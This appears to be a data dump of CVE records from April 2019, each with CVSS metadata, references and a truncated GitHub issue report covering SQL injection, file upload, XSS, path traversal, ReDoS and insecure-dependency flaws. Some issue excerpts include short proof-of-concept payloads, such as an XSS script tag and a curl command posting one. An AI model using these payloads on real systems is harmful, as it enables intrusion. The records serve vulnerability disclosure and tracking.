Verify that sql injection requires **registration** and **score>1**: https://github.com/rocboss/ROCBOSS/blob/master/app/controllers/frontend/PostController.php#L460 ``` if ($uid > 0) { if ($score >= 1 && $score <= 1000) { $topic = TopicModel::m()->getByTid($tid); if (...
ROCBOSS V2.2.1 has SQL injection via the Post:doReward score paramter.
https://api.github.com/repos/rocboss/ROCBOSS-OLD/issues/12/comments
1
2019-04-18T05:49:41Z
2019-04-18T06:04:09Z
https://github.com/rocboss/ROCBOSS-OLD/issues/12
434,600,652
12
323
CVE-2019-11376
2019-04-20T15:29:00.823
SOY CMS v3.0.2 allows remote attackers to execute arbitrary PHP code via a <?php substring in the second text box. NOTE: the vendor indicates that there was an assumption that the content is "made editable on its own.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTI...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "http://www.iwantacve.cn/index.php/archives/212/" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/inunosinsi/soycms...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:brassica:soy_cms:3.0.2:*:*:*:*:*:*:*", "matchCriteriaId": "A2F5113A-7204-45AD-A752-8069D5787B23", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclu...
[ "94" ]
94
https://github.com/inunosinsi/soycms/issues/5
[ "Exploit", "Third Party Advisory" ]
github.com
[ "inunosinsi", "soycms" ]
There is one vulnerability that can getshell(Execute arbitrary php code) Affected software:Soycms v3.0.2 Type of vulnerability:Execute arbitrary php code(can getshell) Discovered by: Yu Yang Affected URL:http://127.0.0.1/soycms/admin/index.php/Site/EditController/1 First,we can install the cms successlly,and we ...
There is one vulnerability that can getshell(Execute arbitrary php code)
https://api.github.com/repos/inunosinsi/soycms/issues/5/comments
2
2019-04-02T07:56:02Z
2020-09-15T09:41:22Z
https://github.com/inunosinsi/soycms/issues/5
428,076,440
5
324
CVE-2019-11377
2019-04-20T15:29:00.933
wcms/wex/finder/action.php in WCMS v0.3.2 has a Arbitrary File Upload Vulnerability via developer/finder because .php is a valid extension according to the fm_get_text_exts function.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTI...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "http://www.iwantacve.cn/index.php/archives/208/" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/vedees/wcms/issue...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:wcms:wcms:0.3.2:*:*:*:*:*:*:*", "matchCriteriaId": "95CE7D1E-E919-449E-88D4-F6A0FCADFAF0", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": ...
[ "434" ]
434
https://github.com/vedees/wcms/issues/2
[ "Exploit", "Third Party Advisory" ]
github.com
[ "vedees", "wcms" ]
A Arbitrary File Upload Vulnerability in wcms/wex/finder/action.php Affected software:WCMS V0.3.2 Type of vulnerability: Arbitrary File Upload Discovered by: Yu Yang Use this upload feature in the developer/finder: ![image](https://user-images.githubusercontent.com/15329046/55458509-bdcfd500-561f-11e9-9db0-86d...
A Arbitrary File Upload Vulnerability in wcms/wex/finder/action.php
https://api.github.com/repos/vedees/wcms/issues/2/comments
2
2019-04-03T06:57:24Z
2019-07-27T16:09:33Z
https://github.com/vedees/wcms/issues/2
428,596,119
2
325
CVE-2019-11378
2019-04-20T15:29:01.027
An issue was discovered in ProjectSend r1053. upload-process-form.php allows finished_files[]=../ directory traversal. It is possible for users to read arbitrary files and (potentially) access the supporting database, delete arbitrary files, access user passwords, or run arbitrary code.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTI...
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://www.securityfocus.com/bid/108069" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/projectsend/projectsend...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:projectsend:projectsend:r1053:*:*:*:*:*:*:*", "matchCriteriaId": "6E0E88A9-54A1-415C-84CC-F13B8AB66643", "versionEndExcluding": null, "versionEndIncluding": null, "versionSta...
[ "22" ]
22
https://github.com/projectsend/projectsend/issues/700
[ "Exploit", "Third Party Advisory" ]
github.com
[ "projectsend", "projectsend" ]
## Type This is a: [X] Bug report ### Description of the problem It is possible for users to read arbitrary files and (potentially) access the supporting database, delete arbitrary files, access user passwords, run arbitrary code. Watch video for detailed information: https://youtu.be/yca1BIDVH-c ### ...
Security Flaw - read and delete arbitrary files (accessible by www-data) and run arbitrary code
https://api.github.com/repos/projectsend/projectsend/issues/700/comments
9
2019-04-18T03:50:31Z
2020-04-22T10:42:59Z
https://github.com/projectsend/projectsend/issues/700
434,577,772
700
326
CVE-2019-11371
2019-04-20T18:29:00.200
BWA (aka Burrow-Wheeler Aligner) 0.7.17 r1198 has a Buffer Overflow via a long prefix that is mishandled in bns_fasta2bntseq and bns_dump at btnseq.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/lh3/bwa/issues/239" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/lh3/bwa/issues/239" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:burrow-wheeler_aligner_project:burrow-wheeler_aligner:0.7.17:r1198:*:*:*:*:*:*", "matchCriteriaId": "303F4F49-E6CD-4A9F-A965-3494918B4510", "versionEndExcluding": null, "versionEndInclud...
[ "787" ]
787
https://github.com/lh3/bwa/issues/239
[ "Third Party Advisory" ]
github.com
[ "lh3", "bwa" ]
I found a buffer overflow in [bns_fasta2bntseq] function. ``` int64_t bns_fasta2bntseq(gzFile fp_fa, const char *prefix, int for_only) { extern void seq_reverse(int len, ubyte_t *seq, int is_comp); // in bwaseqio.c kseq_t *seq; char name[1024]; bntseq_t *bns; uint8_t *pac = 0; int32_t m_seqs, m_holes; ...
[bwa_index] Pack FASTA... *** buffer overflow detected ***
https://api.github.com/repos/lh3/bwa/issues/239/comments
4
2019-04-16T17:43:42Z
2019-12-16T19:31:50Z
https://github.com/lh3/bwa/issues/239
433,906,002
239
327
CVE-2019-11387
2019-04-21T02:29:00.237
An issue was discovered in OWASP ModSecurity Core Rule Set (CRS) through 3.1.0. /rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf allows remote attackers to cause a denial of service (ReDOS) by entering a specially crafted string with nested repetition operators.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Release Notes", "Vendor Advisory" ], "url": "https://coreruleset.org/20190627/announcement-owasp-modsecurity-core-rule-set-version-3-1-1/" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:modsecurity:owasp_modsecurity_core_rule_set:*:*:*:*:*:*:*:*", "matchCriteriaId": "CCB6BFEF-3848-4664-8520-D226834D8FF8", "versionEndExcluding": null, "versionEndIncluding": "3.1.0", ...
[ "400" ]
400
https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1359
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "SpiderLabs", "owasp-modsecurity-crs" ]
The vulnerable regular expression is located in `/crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf` on line 913. [[Link](https://github.com/SpiderLabs/owasp-modsecurity-crs/blob/313ae7d1e525285cd0ff1a830c4f111ffad8b9a7/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf#L913)] The vulnerability is caused by nested repe...
Vulnerable regexp in rule 942260, 942490 (was: 942330)
https://api.github.com/repos/SpiderLabs/owasp-modsecurity-crs/issues/1359/comments
16
2019-04-15T17:25:57Z
2019-07-11T07:30:03Z
https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1359
433,395,994
1,359
328
CVE-2019-11388
2019-04-21T02:29:00.287
An issue was discovered in OWASP ModSecurity Core Rule Set (CRS) through 3.1.0. /rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf allows remote attackers to cause a denial of service (ReDOS) by entering a specially crafted string with nested repetition operators. NOTE: the software maintainer disputes that this is a vulne...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1354" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:modsecurity:owasp_modsecurity_core_rule_set:*:*:*:*:*:*:*:*", "matchCriteriaId": "22FDE55B-5185-40EF-8806-265E29C436D6", "versionEndExcluding": null, "versionEndIncluding": "3.1.0", ...
[ "400" ]
400
https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1354
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "SpiderLabs", "owasp-modsecurity-crs" ]
The vulnerable regular expression is located in `/crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf` on line 404. [[Link](https://github.com/SpiderLabs/owasp-modsecurity-crs/blob/d0440071931e0d56256348334987bd38403d33c0/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf#L404)] The vulnerability is caused by nested repe...
Vulnerable regexp in rule 932140
https://api.github.com/repos/SpiderLabs/owasp-modsecurity-crs/issues/1354/comments
13
2019-04-15T16:03:37Z
2019-07-05T10:27:32Z
https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1354
433,362,647
1,354
329
CVE-2019-11388
2019-04-21T02:29:00.287
An issue was discovered in OWASP ModSecurity Core Rule Set (CRS) through 3.1.0. /rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf allows remote attackers to cause a denial of service (ReDOS) by entering a specially crafted string with nested repetition operators. NOTE: the software maintainer disputes that this is a vulne...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1354" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:modsecurity:owasp_modsecurity_core_rule_set:*:*:*:*:*:*:*:*", "matchCriteriaId": "22FDE55B-5185-40EF-8806-265E29C436D6", "versionEndExcluding": null, "versionEndIncluding": "3.1.0", ...
[ "400" ]
400
https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1372
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "SpiderLabs", "owasp-modsecurity-crs" ]
Hi there, I am submitting this issue as the team is unable to see any impact by using the "exploit strings" i provided. Look at the following regular expression: ``` (?i:(?:(?:(?:^[\"'`\\\\]*?[^\"'`]+[\"'`])+|(?:^[\"'`\\\\]*?[\d\"'`]+)+)\s*?(?:n(?:and|ot)| (?:x?x)?or|between|\|\||like|and|div|&&)\s*?[\w\"'`][+...
Regarding the ReDOS exploit strings & the un-reproducibility
https://api.github.com/repos/SpiderLabs/owasp-modsecurity-crs/issues/1372/comments
5
2019-04-28T08:47:31Z
2019-12-03T00:01:52Z
https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1372
438,031,743
1,372
330
CVE-2019-11389
2019-04-21T02:29:00.363
An issue was discovered in OWASP ModSecurity Core Rule Set (CRS) through 3.1.0. /rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf allows remote attackers to cause a denial of service (ReDOS) by entering a specially crafted string with next# at the beginning and nested repetition operators. NOTE: the software maintainer di...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1356" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:modsecurity:owasp_modsecurity_core_rule_set:*:*:*:*:*:*:*:*", "matchCriteriaId": "22FDE55B-5185-40EF-8806-265E29C436D6", "versionEndExcluding": null, "versionEndIncluding": "3.1.0", ...
[ "400" ]
400
https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1356
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "SpiderLabs", "owasp-modsecurity-crs" ]
The vulnerable regular expression is located in `/crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf` on line 642. [[Link](https://github.com/SpiderLabs/owasp-modsecurity-crs/blob/97969eae7bb8ac7cdc6a8b8132361b701117e564/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf#L642)] The vulnerability is caused by nested repeti...
Vulnerable regexp in rule 933161
https://api.github.com/repos/SpiderLabs/owasp-modsecurity-crs/issues/1356/comments
13
2019-04-15T16:13:02Z
2019-10-21T07:57:03Z
https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1356
433,366,793
1,356
331
CVE-2019-11390
2019-04-21T02:29:00.427
An issue was discovered in OWASP ModSecurity Core Rule Set (CRS) through 3.1.0. /rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf allows remote attackers to cause a denial of service (ReDOS) by entering a specially crafted string with set_error_handler# at the beginning and nested repetition operators. NOTE: the software ...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1358" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:modsecurity:owasp_modsecurity_core_rule_set:*:*:*:*:*:*:*:*", "matchCriteriaId": "22FDE55B-5185-40EF-8806-265E29C436D6", "versionEndExcluding": null, "versionEndIncluding": "3.1.0", ...
[ "400" ]
400
https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1358
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "SpiderLabs", "owasp-modsecurity-crs" ]
The vulnerable regular expression is located in `/crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf` on line 337. [[Link](https://github.com/SpiderLabs/owasp-modsecurity-crs/blob/97969eae7bb8ac7cdc6a8b8132361b701117e564/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf#L337)] The vulnerability is caused by nested repeti...
Vulnerable regexp in rule 933160
https://api.github.com/repos/SpiderLabs/owasp-modsecurity-crs/issues/1358/comments
3
2019-04-15T17:01:38Z
2019-10-21T07:57:46Z
https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1358
433,386,680
1,358
332
CVE-2019-11391
2019-04-21T02:29:00.487
An issue was discovered in OWASP ModSecurity Core Rule Set (CRS) through 3.1.0. /rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf allows remote attackers to cause a denial of service (ReDOS) by entering a specially crafted string with $a# at the beginning and nested repetition operators. NOTE: the software maintainer disp...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1357" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:modsecurity:owasp_modsecurity_core_rule_set:*:*:*:*:*:*:*:*", "matchCriteriaId": "22FDE55B-5185-40EF-8806-265E29C436D6", "versionEndExcluding": null, "versionEndIncluding": "3.1.0", ...
[ "400" ]
400
https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1357
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "SpiderLabs", "owasp-modsecurity-crs" ]
The vulnerable regular expression is located in `/crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf` on line 451. [[Link](https://github.com/SpiderLabs/owasp-modsecurity-crs/blob/97969eae7bb8ac7cdc6a8b8132361b701117e564/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf#L451)] The vulnerability is caused by nested repeti...
Vulnerable regexp in rule 933180
https://api.github.com/repos/SpiderLabs/owasp-modsecurity-crs/issues/1357/comments
3
2019-04-15T16:22:53Z
2019-10-21T07:58:13Z
https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1357
433,371,043
1,357
333
CVE-2019-11401
2019-04-22T11:29:04.313
A issue was discovered in SiteServer CMS 6.9.0. It allows remote attackers to execute arbitrary code because an administrator can add the permitted file extension .aassp, which is converted to .asp because the "as" substring is deleted.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTI...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/siteserver/cms/issues/1858" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github....
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:siteserver:siteserver_cms:6.9.0:*:*:*:*:*:*:*", "matchCriteriaId": "2BA2A7FB-FD45-492A-81C7-4F13D2D01C53", "versionEndExcluding": null, "versionEndIncluding": null, "versionS...
[ "434" ]
434
https://github.com/siteserver/cms/issues/1858
[ "Exploit", "Third Party Advisory" ]
github.com
[ "siteserver", "cms" ]
After the administrator logged in and added a new permitted extension of file such as "aassp". ![image](https://user-images.githubusercontent.com/16362115/56075035-70592200-5dee-11e9-8c5e-4f6e49e397b6.png) The administrator can upload a malicious file which extension is "aassp". After the file was filtered b...
There is a vulnerability that the attacker can uploads a file bypassed the filtering rule to getshell.
https://api.github.com/repos/siteserver/cms/issues/1858/comments
4
2019-04-12T14:26:53Z
2020-04-22T09:59:50Z
https://github.com/siteserver/cms/issues/1858
432,593,839
1,858
334
CVE-2019-11404
2019-04-22T11:29:04.580
arrow-kt Arrow before 0.9.0 resolved Gradle build artifacts (for compiling and building the published JARs) over HTTP instead of HTTPS. Any of these dependent artifacts could have been maliciously compromised by an MITM attack.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/arrow-kt/ank/issues/35" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/arrow-kt/a...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:arrow-kt:arrow:*:*:*:*:*:*:*:*", "matchCriteriaId": "70E9185C-2AB7-4DE7-832E-C7F04B898592", "versionEndExcluding": "0.9.0", "versionEndIncluding": null, "versionStartExcludin...
[ "311" ]
311
https://github.com/arrow-kt/ank/issues/35
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "arrow-kt", "ank" ]
[CWE-829: Inclusion of Functionality from Untrusted Control Sphere](https://cwe.mitre.org/data/definitions/829.html) [CWE-494: Download of Code Without Integrity Check](https://cwe.mitre.org/data/definitions/494.html) The build files indicate that this project is resolving dependencies over HTTP instead of HTTPS. A...
[SECURITY] Releases are built/executed/released in the context of insecure/untrusted code
https://api.github.com/repos/arrow-kt/ank/issues/35/comments
0
2019-02-19T21:46:56Z
2019-02-20T17:05:22Z
https://github.com/arrow-kt/ank/issues/35
412,139,559
35
335
CVE-2019-11404
2019-04-22T11:29:04.580
arrow-kt Arrow before 0.9.0 resolved Gradle build artifacts (for compiling and building the published JARs) over HTTP instead of HTTPS. Any of these dependent artifacts could have been maliciously compromised by an MITM attack.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/arrow-kt/ank/issues/35" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/arrow-kt/a...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:arrow-kt:arrow:*:*:*:*:*:*:*:*", "matchCriteriaId": "70E9185C-2AB7-4DE7-832E-C7F04B898592", "versionEndExcluding": "0.9.0", "versionEndIncluding": null, "versionStartExcludin...
[ "311" ]
311
https://github.com/arrow-kt/arrow/issues/1310
[ "Exploit", "Third Party Advisory" ]
github.com
[ "arrow-kt", "arrow" ]
[CWE-829: Inclusion of Functionality from Untrusted Control Sphere](https://cwe.mitre.org/data/definitions/829.html) The build files indicate that this project is resolving dependencies over HTTP instead of HTTPS. Any of these artifacts could have been MITM to maliciously compromise them and infect the build artif...
[CVE-2019-11404][SECURITY] Releases are built/executed/released in the context of insecure/untrusted code
https://api.github.com/repos/arrow-kt/arrow/issues/1310/comments
18
2019-02-19T13:37:39Z
2019-05-03T20:17:50Z
https://github.com/arrow-kt/arrow/issues/1310
411,927,407
1,310
336
CVE-2019-11405
2019-04-22T11:29:04.783
OpenAPI Tools OpenAPI Generator before 4.0.0-20190419.052012-560 uses http:// URLs in various build.gradle, build.gradle.mustache, and build.sbt files, which may have caused insecurely resolved dependencies.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.8, "confidentialityImpact": "PARTIAL...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/OpenAPITools/openapi-generator/issues/2253" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/OpenAPITools/openapi...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openapi-generator:openapi_generator:*:*:*:*:*:*:*:*", "matchCriteriaId": "B3208D75-72B6-4B46-A8D4-1984DA76142B", "versionEndExcluding": "4.0.0-20190419.052012-560", "versionEndIncluding"...
[ "311" ]
311
https://github.com/OpenAPITools/openapi-generator/issues/2253
[ "Exploit", "Third Party Advisory" ]
github.com
[ "OpenAPITools", "openapi-generator" ]
[CWE-829: Inclusion of Functionality from Untrusted Control Sphere](https://cwe.mitre.org/data/definitions/829.html) [CWE-494: Download of Code Without Integrity Check](https://cwe.mitre.org/data/definitions/494.html) This project is generating starter projects that are resolving dependencies over HTTP instead of H...
[BUG][SECURITY][CVE-2019-11405] Code generator generates projects with insecure repositories
https://api.github.com/repos/OpenAPITools/openapi-generator/issues/2253/comments
7
2019-02-27T14:13:28Z
2019-06-12T11:55:07Z
https://github.com/OpenAPITools/openapi-generator/issues/2253
415,144,892
2,253
337
CVE-2019-11428
2019-04-22T11:29:05.767
I, Librarian 4.10 has XSS via the export.php export_files parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/mkucej/i-librarian/issues/139" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://gith...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:i-librarian:i\\,_librarian:4.10:*:*:*:*:*:*:*", "matchCriteriaId": "C1942913-38F2-41F7-80F9-887EE83FC680", "versionEndExcluding": null, "versionEndIncluding": null, "versionS...
[ "79" ]
79
https://github.com/mkucej/i-librarian/issues/139
[ "Exploit", "Third Party Advisory" ]
github.com
[ "mkucej", "i-librarian" ]
# Summary The parameter **export_files** is not sanitized, so attackers can poison this parameter and then create a reflected XSS attack. # POC ```https://i-librarian.net/demo/export.php?export_files="><script>alert(1)</script>``` # Detail The flaw exists since **$get_post_export_files** was assigned to a GET pa...
XSS vulnerability in export.php
https://api.github.com/repos/mkucej/i-librarian/issues/139/comments
0
2019-04-18T09:45:37Z
2019-04-18T12:42:10Z
https://github.com/mkucej/i-librarian/issues/139
434,682,342
139
338
CVE-2019-11449
2019-04-22T14:29:00.560
I, Librarian 4.10 has XSS via the notes.php notes parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/mkucej/i-librarian/issues/140" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://gith...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:i-librarian:i\\,_librarian:4.10:*:*:*:*:*:*:*", "matchCriteriaId": "C1942913-38F2-41F7-80F9-887EE83FC680", "versionEndExcluding": null, "versionEndIncluding": null, "versionS...
[ "79" ]
79
https://github.com/mkucej/i-librarian/issues/140
[ "Exploit", "Third Party Advisory" ]
github.com
[ "mkucej", "i-librarian" ]
## Summary The parameter `$notes` is not sanitized after querying from database, so attackers can create a stored XSS attack. ## How to reproduce 1. `curl http://<domain.tld>/notes.php --data 'file=1&notes=<script>alert(1)</script>' --cookie 'PHPSESSID=<session_id>'` 2. in your browser, access `http://<domain.tld...
Stored XSS in notes.php
https://api.github.com/repos/mkucej/i-librarian/issues/140/comments
2
2019-04-18T15:18:33Z
2019-04-20T17:14:16Z
https://github.com/mkucej/i-librarian/issues/140
434,824,908
140
339
CVE-2019-11243
2019-04-22T15:29:00.790
In Kubernetes v1.12.0-v1.12.4 and v1.13.0, the rest.AnonymousClientConfig() method returns a copy of the provided config, with credentials removed (bearer token, username/password, and client certificate/key data). In the affected versions, rest.AnonymousClientConfig() did not effectively clear service account credenti...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL...
[ { "source": "jordan@liggitt.net", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://www.securityfocus.com/bid/108053" }, { "source": "jordan@liggitt.net", "tags": [ "Third Party Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/7...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "DA1909D3-D45E-4AD4-B773-51ADCFC63113", "versionEndExcluding": null, "versionEndIncluding": "1.12.4", "versionStart...
[ "212" ]
212
https://github.com/kubernetes/kubernetes/issues/76797
[ "Third Party Advisory" ]
github.com
[ "kubernetes", "kubernetes" ]
